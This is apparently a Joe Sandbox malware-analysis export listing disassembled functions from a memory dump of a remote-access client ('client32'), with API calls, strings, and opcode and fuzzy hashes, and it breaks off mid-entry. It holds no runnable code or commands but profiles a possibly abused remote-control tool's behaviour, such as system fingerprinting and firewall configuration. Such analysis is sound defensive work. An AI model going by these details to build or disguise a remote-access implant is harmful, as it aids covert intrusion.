Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastMessagePlacementProcessWindow
String ID: %d %d %d %d %d %d %d %d %d$,$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1558849722-3161889720
Opcode ID: 73de7ceb810dcf3dc0e6fe34983823d3218802d2047d5019bbdc052d60cc2ef5
Instruction ID: 742e5ace20a97de8ca79747b95889828f52ebd537d29748e29f527d17f7b899b
Opcode Fuzzy Hash: 73de7ceb810dcf3dc0e6fe34983823d3218802d2047d5019bbdc052d60cc2ef5
Instruction Fuzzy Hash: AA2127B5A00119ABDB04CFD9DC85EEFF3B9EB8C208F108169F919A7240D670AD11CBA5

Function 110178F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1101792C
CoInitialize.OLE32(00000000), ref: 11017935
_GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
CoUninitialize.OLE32 ref: 110179C0

Strings

Win32_ComputerSystem, xrefs: 1101794D
PCSystemTypeEx, xrefs: 1101796C

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InitializeObjectSingleStringUninitializeW@16Wait
String ID: PCSystemTypeEx$Win32_ComputerSystem
API String ID: 2407233060-578995875
Opcode ID: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
Instruction ID: 979ee595df3e366e36f6db43f9274242a875182caa54ddfda208ac7f01cc4ef4
Opcode Fuzzy Hash: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
Instruction Fuzzy Hash: BE213EB5D0166A9FDB11CFA48C40BBAB7E99F4170CF0000B4EC59DB188EB79D544D791

Function 11017810 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 11017842
CoInitialize.OLE32(00000000), ref: 1101784B
_GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
CoUninitialize.OLE32 ref: 110178D0

Strings

Win32_SystemEnclosure, xrefs: 11017863
ChassisTypes, xrefs: 11017882

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InitializeObjectSingleStringUninitializeW@16Wait
String ID: ChassisTypes$Win32_SystemEnclosure
API String ID: 2407233060-2037925671
Opcode ID: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
Instruction ID: 35f99737241494c501e89beb979cd88c9c6eddc8ed8b09fe319fdcc96c080ea2
Opcode Fuzzy Hash: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
Instruction Fuzzy Hash: D7210875D4112A9BD711CFA4CD40BAEBBE89F40309F0000A4EC29DB244EE75D910C7A0

Function 11139600 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1113962A
GetTickCount.KERNEL32 ref: 11139631

Strings

Client, xrefs: 11139655
DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 111396EC
DoICFConfig() OK, xrefs: 111396D6
AutoICFConfig, xrefs: 11139650

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick
String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
API String ID: 536389180-1512301160
Opcode ID: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
Instruction ID: a12453e9faa0d912da9f55e5525ca7a81223e7cd1b6d2efb44fc6fc6c8488c0a
Opcode Fuzzy Hash: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
Instruction Fuzzy Hash: 2B21277CA262AF4AFB12CE75DED4791FA92278232EF010178D515862CCFBB49448CF46

Function 110ED020 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

IsWindow.USER32(0000070B), ref: 110ED02A

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

LoadCursorA.USER32(00000000,00007F00), ref: 110ED0B1
SetCursor.USER32(00000000), ref: 110ED0B8

Strings

IsWindow(hRich), xrefs: 110ED03E
..\CTL32\NSWin32.cpp, xrefs: 110ED039, 110ED057
pEnLink!=0, xrefs: 110ED05C

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Cursor$ErrorExitLastLoadMessageProcessWindowwsprintf
String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
API String ID: 2735369351-763374134
Opcode ID: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
Instruction ID: 1517011758136c5ff836e71d92dda8c4c85f8f681a38b9b7789002e2c31f8d4e
Opcode Fuzzy Hash: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
Instruction Fuzzy Hash: 2F01497AE412253BD511A5537C0AFDFBB1CEF412ADF040031FD1996201F66AB11583E6

Function 110056A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(00000000,?), ref: 110056DD
BeginPaint.USER32(?,?), ref: 110056E8
BitBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 1100570A
EndPaint.USER32(?,?), ref: 1100572F

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 110056C8
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110056C3

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Paint$BeginClientErrorExitLastMessageProcessRectwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1216912278-2830328467
Opcode ID: 8ad934cf7e7b29b38782cb4c4aa0535e86b672492a30f68ceedf0682d58b908e
Instruction ID: 646bbc1308694ba02cb50681d3c8309cd3c635e6896d205317d73ea189e6e8a3
Opcode Fuzzy Hash: 8ad934cf7e7b29b38782cb4c4aa0535e86b672492a30f68ceedf0682d58b908e
Instruction Fuzzy Hash: FA1194B5A40219BFD714CBA0CD85FBEB3BCEB88709F104569F51796584DBB0A904C764

Function 110B94B0 Relevance: 10.6, APIs: 7, Instructions: 58COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(75BF7AA0,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B94C7
GetCursorPos.USER32(110C032C), ref: 110B94D6

Part of subcall function 1115F5B0: GetWindowRect.USER32(?,?), ref: 1115F5CC

PtInRect.USER32(110C032C,110C032C,110C032C), ref: 110B94F4
ClientToScreen.USER32(?,110C032C), ref: 110B9516
SetCursorPos.USER32(110C032C,110C032C,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B9524
LoadCursorA.USER32(00000000,00007F00), ref: 110B9531
SetCursor.USER32(00000000,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B9538

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Cursor$RectWindow$ClientForegroundLoadScreen
String ID:
API String ID: 3235510773-0
Opcode ID: 8d2b5613eb67d591a4703b81c38f404f3807f5f87d52da527a803e22d8ab7870
Instruction ID: e413c7048e2c9fc99527a8bfd6ed1c185ebac442807b3b09d80bd78fd45dd6ba
Opcode Fuzzy Hash: 8d2b5613eb67d591a4703b81c38f404f3807f5f87d52da527a803e22d8ab7870
Instruction Fuzzy Hash: A8115B72A4020E9BDB18DFA4C984DAFF7BCFB48215B004569E52297644DB34E906CBA4

Function 1100B340 Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(?), ref: 1100B350
EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B389
EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3A8

Part of subcall function 1100A250: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
Part of subcall function 1100A250: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A298
Part of subcall function 1100A250: GetLastError.KERNEL32 ref: 1100A2A0
Part of subcall function 1100A250: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
Part of subcall function 1100A250: CloseHandle.KERNEL32(00000000), ref: 1100A2BB

waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BF9B,?,00000000,00000002), ref: 1100B3B8
LeaveCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3BF
_free.LIBCMT ref: 1100B3C8
_free.LIBCMT ref: 1100B3CE

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
String ID:
API String ID: 705253285-0
Opcode ID: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
Instruction ID: 939bcaf7555c717cf87bfebf1d57658177790bd0868e621cfe44e5f8350f5b2d
Opcode Fuzzy Hash: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
Instruction Fuzzy Hash: 5511C276900718ABE321CEA0DC88BEFB3ECBF48359F104519FA6692544D774B501CB64

Function 11079270 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 45COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(00000000,00000000,00000000), ref: 110792EF

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\ctl32\Coolbar.cpp, xrefs: 11079286, 110792AC
m_hWnd, xrefs: 110792DA
iTab >= 0 && iTab < idata->pButtonInfo->m_iCount, xrefs: 110792B1
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110792D5
idata->pButtonInfo, xrefs: 1107928B

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitInvalidateLastMessageProcessRectwsprintf
String ID: ..\ctl32\Coolbar.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$iTab >= 0 && iTab < idata->pButtonInfo->m_iCount$idata->pButtonInfo$m_hWnd
API String ID: 2776021309-3012761530
Opcode ID: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
Instruction ID: 43535e2045e6edea7900c1da28a671eb4229fa08b0c2923c5f5b9d209a058891
Opcode Fuzzy Hash: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
Instruction Fuzzy Hash: 7101D675F04355BBE710EE86ECC2FD6FBA4AB50368F00402AF95526581E7B1B440C6A5

Function 1101D660 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrywindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101D66E
LoadIconA.USER32(00000000,0000139A), ref: 1101D6BF
LoadCursorA.USER32(00000000,00007F00), ref: 1101D6CF
RegisterClassExA.USER32(00000030), ref: 1101D6F1
GetLastError.KERNEL32 ref: 1101D6F7

Strings

0, xrefs: 1101D67C

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Load$ClassCursorErrorIconLastRegister_memset
String ID: 0
API String ID: 430917334-4108050209
Opcode ID: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
Instruction ID: bb5add8fba7068f0a6842358c407e6d623dbc87194615988f67ff79f51c59528
Opcode Fuzzy Hash: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
Instruction Fuzzy Hash: E1018074C5031DABEB00DFE0CD59B9DBBB4AB0830CF004429E525BA680EBB91104CB99

Function 11003390 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EFD), ref: 1100339D
GetSubMenu.USER32(00000000,00000000), ref: 110033C3
DestroyMenu.USER32(00000000), ref: 110033F2

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\annotate.cpp, xrefs: 110033AE, 110033D4
hMenu, xrefs: 110033B3
hSub, xrefs: 110033D9

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
Instruction ID: f0241db128611486ad2bba77008837faff31f6141376dc95c8c97f83293769ff
Opcode Fuzzy Hash: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
Instruction Fuzzy Hash: 09F0EC3EE9063573D25211772C4AF8FB6844B8569DF540032FD26BA740EE14A40147B9

Function 11003480 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EF1), ref: 1100348D
GetSubMenu.USER32(00000000,00000000), ref: 110034B3
DestroyMenu.USER32(00000000), ref: 110034E2

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
